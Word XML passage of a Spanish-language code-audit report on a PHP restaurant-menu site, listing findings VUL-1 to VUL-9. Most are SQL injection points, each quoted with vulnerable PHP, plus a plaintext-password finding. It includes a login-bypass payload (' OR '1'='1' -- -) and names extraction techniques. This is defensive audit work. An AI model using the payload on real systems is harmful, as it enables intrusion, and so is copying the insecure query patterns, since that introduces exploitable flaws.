          <w:p w14:paraId="6E290604"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Revisión línea a línea de los archivos PHP, JavaScript y SQL en busca de patrones de codificación insegura</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="7ABA4200" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="600"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3320246C"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Identificación de superficie de ataque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5135" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7322022C"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Enumeración de todos los puntos de entrada de datos del usuario: parámetros GET/POST, formularios y llamadas AJAX, archivo por archivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="6F7BF480" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="600"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5682E91E"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Análisis de configuración y dependencias</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5135" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77360C1F"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Revisión de credenciales embebidas, librerías de terceros (vendors) y configuración del entorno de conexión a base de datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="4FD0BB80" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="900"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="015FBA6E"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Clasificación y documentación de hallazgos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5135" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="507FBF0A" w14:textId="77777777" w:rsidR="002D520B" w:rsidRPr="002D520B" w:rsidRDefault="002D520B" w:rsidP="00AE37FA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>Registro individual de cada vulnerabilidad identificada según OWASP Top 10:2021 y OWASP ASVS v5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15B5ECC7" w14:textId="77777777" w:rsidR="002D520B" w:rsidRDefault="002D520B"/>
    <w:p w14:paraId="7F494882" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="00D21427"/>
    <w:p w14:paraId="396FA89A" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="00D21427"/>
    <w:p w14:paraId="0BA3DBB6" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="00D21427"/>
    <w:p w14:paraId="28309EB3" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="00D21427"/>
    <w:p w14:paraId="6C44FABD" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="00D21427"/>
    <w:p w14:paraId="43228E31" w14:textId="77777777" w:rsidR="001F6BF4" w:rsidRPr="002D520B" w:rsidRDefault="001F6BF4" w:rsidP="001F6BF4">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-CL" w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-CL" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidencias de </w:t>
      </w:r>
      <w:r w:rsidR="00AE37FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-CL" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Vulnerabilidades</w:t>
      </w:r>
    </w:p>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46E593E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FB5BA74"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9BEC704"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="1C04F0A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47285457" w14:textId="79CB618D"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71386844" w14:textId="34367B61"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 en autenticación)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="466C3860"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0671E1D"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EFB36A5"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4742065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0BB8BF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5F4B148"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setup/procesalogin.php (líneas 5-6) — módulo de autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="00E07260"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AFA737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52BEAEE"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El formulario de login concatena directamente los parámetros POST "frmusuario" y "frmpassword" dentro de la sentencia SQL, sin validación, sanitización ni uso de consultas preparadas. Esto permite evadir por completo el proceso de autenticación (ej. usando ' OR '1'='1' -- - en el campo usuario) y acceder al sistema sin conocer credenciales válidas, además de permitir extracción de datos mediante UNION/booleana/tiempo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="23A7B8A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D906C0C"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88DD16A"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$sql="select * from usuarios where email='</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">_POST['frmusuario']."' and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>='</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_POST['frmpassword']."'";</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>$result=mysqli_query(conectar(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>),$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sql);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>Payload de prueba en frmusuario:  ' OR '1'='1' -- -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7462F29E"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20E1F56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47BE84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08B08EA"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VUL-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="4C974F50"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178FC4E3"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0180FDDA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="7A03C2D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3CA95F7"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lastRenderedPageBreak/>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DE80B3B"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4BDF5917"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D571F1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25116AB"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index.php (líneas 7, 10-11) — consulta de datos del restaurante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="0033AFD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2699F52"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911F012"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El parámetro $_GET['id'] se asigna a $key sin validación de tipo y se concatena directamente en la consulta que obtiene los datos del restaurante a mostrar, permitiendo inyección SQL a través de la URL (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>ej. index.php?</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>id=...).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="6B866E0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9EE9C82"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1F6FE4C"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$key=$_GET['id'];</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">$sql_restorant="SELECT ... WHERE restautantes.id = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">key." AND </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>restautantes.eliminado</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> IS NULL";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F378970"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1038490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0A05C70"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3070ADC"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VUL-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="778642D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5A575B3A"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6453A24D"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="1B82CE3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4BEBD91"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47B5BEF"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0793837B"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42D1D00"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1BE2B64"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index.php (líneas 147-148) — consulta de ítems destacados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="3BF8F42B"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127CB9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EBA4BC1"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La consulta que obtiene los ítems destacados del menú reutiliza la variable $key (derivada de $_GET['id']) concatenada directamente en la cláusula WHERE, sin sanitización.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="303EC6F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8BBF34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D70ECF2"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 xml:space="preserve">$sql="SELECT ... WHERE </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>items.destacado</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = 1 AND ... AND </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>cartas.restautantes</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">_id = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">key." AND </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>cartas.eliminada</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> IS NULL ...";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7363133E"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7E33526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AE62FD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BC6A1A0"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VUL-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="72B09C25"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11EC82F3"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396855CE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="3E1F9A9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C632F40"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418952D"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766986C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D7B6CDF"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30CA02B"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index.php (línea 228) — consulta de listado de cartas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="5043BEC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965905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85F04B0"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La consulta que obtiene el listado de "cartas" (pestañas del menú) concatena nuevamente la variable $key sin sanitización, repitiendo el mismo patrón inseguro en un tercer punto del mismo archivo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="42F3368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1FAFF9B"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52CCE4D"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 xml:space="preserve">$sqlcartas="SELECT ... FROM cartas WHERE </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>cartas.restautantes</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">_id = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>key." and visible=1 AND eliminada IS NULL order by orden asc";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="077F37EE"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23842D47"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6914E00"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F6A13BD"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VUL-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="264FCCB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20C9BAC3"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760E86A1"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="2F9FD1AD"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E6E7169"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E01A18F"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77CDC66B"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13BB4D0"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A9456AC"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index.php (línea 407) — consulta de comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="09375A6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C41F11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8CA6FFE"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La consulta que recupera los comentarios asociados al restaurante concatena directamente la variable $key, constituyendo un cuarto punto de inyección independiente dentro de index.php.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="4D02683B"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B9440CB"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1866CA2"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$sqlcomentarios="select * from comentarios where id_restaurante=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>key;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70657021"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793B114D"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E8B93E0"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BB4FC2C"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VUL-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="3D113D2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6A13B7B2"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117B2A44"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="01C518C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964FCAE"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23E796D"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294DA92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153428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22C51DE"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mostrar_carrito.php (líneas 5, 7-8) — consulta de datos del restaurante</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="42C66B3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35F1F67"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lastRenderedPageBreak/>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3446AEB"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El mismo patrón de $_GET['id'] concatenado sin sanitización se repite en la vista del carrito de compras, en un archivo independiente de index.php.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="4362FF6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10B5559"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AD61EA9"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$key=$_GET['id'];</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">$sql_restorant="SELECT ... WHERE restautantes.id = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>key;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47EBF8BD"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49F535E6"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2B255F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E98760A"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VUL-7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="7AC644B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5F219158"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25D1C02D"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="4706BF8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3469CBC"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6F7AF23"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6DF72B8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8EFB5B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F1B862C"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 xml:space="preserve">carrito.php (línea 19, función </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>insertar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)) — agregar ítem al carrito</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="2E4D521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E4D1F2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FB0D7A3"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El parámetro $_POST['iditems'], recibido vía AJAX desde js/controladorajax.js, se concatena directamente en la consulta que agrega un producto al carrito, permitiendo inyección SQL vía POST.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="6D565AA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753404D"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FD6C527"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$sql="select id, nombre, precio from items where id=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_POST['iditems'];</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24E1CC9C"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79"/>
        <w:gridCol w:w="7643"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="4A136407"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57338D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058647A"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VUL-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="2E85C155"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64F133DC"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145F7E87"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(SQL Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="6D6A3CD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C56ADDF"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459359B"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5588D36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FAE0E61"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36A7148"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grcomentarios.php (línea 6) — inserción de comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="68AD899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D225D1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A5A63A5"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Los parámetros $_POST['usuario'] y $_POST['comentario'] se concatenan directamente en una sentencia INSERT, permitiendo tanto inyección SQL como manipulación del contenido almacenado en la base de datos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="04102E4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483EE6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45D8DA8"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$sql="INSERT INTO comentarios SET usuario='</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_POST['usuario']."</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>',comentario</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>='</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_POST['comentario']."</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>',id</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_restaurante=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_SESSION['id'];</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BCB9E12"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390B38C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D7C21A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E241375"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VUL-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="7F592D8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7E8E4338"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32B5B122"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A02:2021 – Cryptographic Failures (contraseñas en texto plano)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="63588F7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B33AAFF"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833B94D"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CRÍTICA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
